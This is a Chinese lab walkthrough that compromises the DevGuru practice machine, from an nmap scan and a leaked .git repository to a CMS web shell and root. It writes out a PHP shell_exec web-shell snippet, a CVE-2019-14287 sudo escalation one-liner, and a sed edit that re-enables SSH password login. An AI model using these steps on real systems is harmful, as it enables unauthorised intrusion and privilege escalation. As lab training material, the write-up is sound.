devguru滲透筆記
資訊收集
kali ip
目標ip
首先我們掃描一下開放埠
nmap -A -p- 192.168.20.143 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-18 10:41 CST Nmap scan report for bogon (192.168.20.143) Host is up (0.00044s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA) | 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA) |_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: DevGuru | http-git: | 192.168.20.143:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... | Last commit message: first commit | Remotes: | http://devguru.local:8585/frank/devguru-website.git |_ Project type: PHP application (guessed from .gitignore) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Corp - DevGuru 8585/tcp open unknown | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=3fa58b0407bb4cfd; Path=/; HttpOnly | Set-Cookie: _csrf=1i6eRR0jsBy2m3oVLV7XjbmTO3Y6MTYzOTc5NTMyOTAyODgyNzUyOQ; Path=/; Expires=Sun, 19 Dec 2021 02:42:09 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sat, 18 Dec 2021 02:42:09 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title> Gitea: Git with a cup of tea </title> | <link rel="manifest" href=https://www.cnblogs.com/haohao1/p/"/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> | <meta name="description" content="Gitea (Git with a cup of tea) is a painless | HTTPOptions: | HTTP/1.0 404 Not Found | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=e9eacdab4eb43047; Path=/; HttpOnly | Set-Cookie: _csrf=YyIv1BjKfPG8puskKPj8fZUT62c6MTYzOTc5NTMyOTA0MjA2MDQ2Nw; Path=/; Expires=Sun, 19 Dec 2021 02:42:09 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sat, 18 Dec 2021 02:42:09 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Page Not Found - Gitea: Git with a cup of tea </title> | <link rel="manifest" href=https://www.cnblogs.com/haohao1/p/"/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> |_ <meta name="description" content="Gitea (Git with a c 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8585-TCP:V=7.91%I=7%D=12/18%Time=61BD4A81%P=x86_64-pc-linux-gnu%r(G SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20 SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\ SF:x20Request")%r(GetRequest,2A00,"HTTP/1\.0\x20200\x20OK\r\nContent-Type: SF:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/ SF:;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=3fa58b0407bb4cfd SF:;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=1i6eRR0jsBy2m3oVLV7Xjb SF:mTO3Y6MTYzOTc5NTMyOTAyODgyNzUyOQ;\x20Path=/;\x20Expires=Sun,\x2019\x20D SF:ec\x202021\x2002:42:09\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEO SF:RIGIN\r\nDate:\x20Sat,\x2018\x20Dec\x202021\x2002:42:09\x20GMT\r\n\r\n< SF:!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<head\ SF:x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\" SF:viewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t<m SF:eta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title SF:>\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<lin SF:k\x20rel=\"manifest\"\x20href=https://www.cnblogs.com/"/manifest\.json\"\x20crossorigin=\"use- SF:credentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\"> SF:\n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20 SF:a\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20conte SF:nt=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pa SF:inless")%r(HTTPOptions,212A,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConten SF:t-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x2 SF:0Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=e9eacdab4 SF:eb43047;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=YyIv1BjKfPG8pus SF:kKPj8fZUT62c6MTYzOTc5NTMyOTA0MjA2MDQ2Nw;\x20Path=/;\x20Expires=Sun,\x20 SF:19\x20Dec\x202021\x2002:42:09\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x SF:20SAMEORIGIN\r\nDate:\x20Sat,\x2018\x20Dec\x202021\x2002:42:09\x20GMT\r SF:\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\ SF:n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20 SF:name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\" SF:>\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\ SF:t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x20a\x20 SF:cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href=https://www.cnblogs.com/"/ma SF:nifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20name=\"t SF:heme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\x20con SF:tent=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>\n\t<m SF:eta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x20a\x2 SF:0c"); MAC Address: 00:0C:29:49:16:E8 (VMware) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.44 ms bogon (192.168.20.143) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 94.30 seconds
開放了22,80,8585埠,內核版本認為是Linux4.x或5.x的版本,在80埠處提示了一個域名,那我們將域名和ip地址手動進行系結一下
我們再看nmap掃描得出的結果這里發現一個.git的目錄,這時候我們就想到可以將這個目錄匯出來,推薦使用gitdump,但我這里使用githacker使用習慣了我就使用githacker了
我們來看一下看看git倉庫有什么樣的資訊
我們先來看一下README.md
簡單看了一下就是輔助安裝檔案以及安裝的最低要求
到config里面看看有沒有什么資訊
我們先看一下app.php里面的東西
大致就存盤的一些資訊沒啥用
然后我們來看一下database.php的相關資訊
這里我們意外發現mysql的登錄用戶名和密碼
然后在倉庫檔案夾中發現adminer.php我們去搜一下這東西
經過搜索發現原來是資料庫管理工具
然后我們去80埠看看,成功進入登錄頁面
然后我們使用mysql用戶名密碼登錄
成功登錄
然后我們嘗試爆破一下目錄
掃描到這個感覺像后臺登錄地址
測驗了一下果真
然后我們去看一下資料庫里面的資料看看有沒有關于用戶名密碼的
發現一個用戶名密碼
然后我們去看一下后臺組的情況
只有一個,網站擁有組的權限,所有用戶只有一個組網站擁有組
然后我們去看一下用戶名和用戶密碼,密碼是一種加密的方式顯示出來的,我們去搜搜看密碼前幾位,看看能不能搜出相關的加密方式還真能搜到
我們搜搜看有沒有在線加密工具搜到了鏈接如下
https://www.jisuan.mobi/p163u3BN66Hm6JWx.html
然后我們Rounds使用默認的即可,密碼就設定為123456
然后我們到資料庫中修改值
然后我們去登陸,成功登入后臺
漏洞利用
在CMS這個欄發現有編輯代碼的功能,我們自己來構造一個惡意代碼
代碼內容
function onStart() { $this->page['myVar']=shell_exec($_REQUEST['cmd']); }
在Makeup這欄把東西加上去
然后我們保存并嘗試到前端去執行指令
成功執行,建立反向連接shell,并將它保存到shell.php中
然后我們在kali搭建一個簡單的網站服務,并且將shell上傳到服務器中
使用msfconsole進行監聽
瀏覽器訪問shell
成功連接
查看當前權限
使用python建立互動式提示符
python3 -c "import pty;pty.spawn('/bin/bash')"#靶機沒有python2要用python3執行
然后到處找找在/var發現備份檔案然后我們將他下載下來看看
我們來看看app.ini.bak
又發現一組資料庫資訊我們去登錄又發現一組用戶名密碼但密碼是加密的我們重點看這個提示
由于我沒找到如何解開這段密文,那我們就修改加密方式并把密文改掉
這個站點在8585埠還有個東西我們訪問一下,然后嘗試登錄,最后發現成功登錄
到處看看發現這里我們是可以輸入的
我們嘗試在這里構造一段惡意代碼,然后看看能回傳什么權限
msf設定監聽
生成惡意代碼
上傳惡意代碼
下面就是想辦法觸發
我們在倉庫那里發現是可以編輯的我們多加點空行即可觸發
查看一下權限
發現已經是普通用戶權限
就發現了flag
提權
sudo -l 檢查sudo命令執行的情況
發現命令結果
有這樣的配置,同時sudo命令版本低于1.8.27所以判斷存在CVE-2019-14287漏洞,使用payload進行提權
sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
獲得root權限
修改SSH組態檔使用SSH連接
sed -i "s/PasswordAuthenication no/PasswordAuthentication yes/" /etc/ssh/sshd_config
SSH連接成功
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/458281.html
標籤:其他
上一篇:博客生涯的反思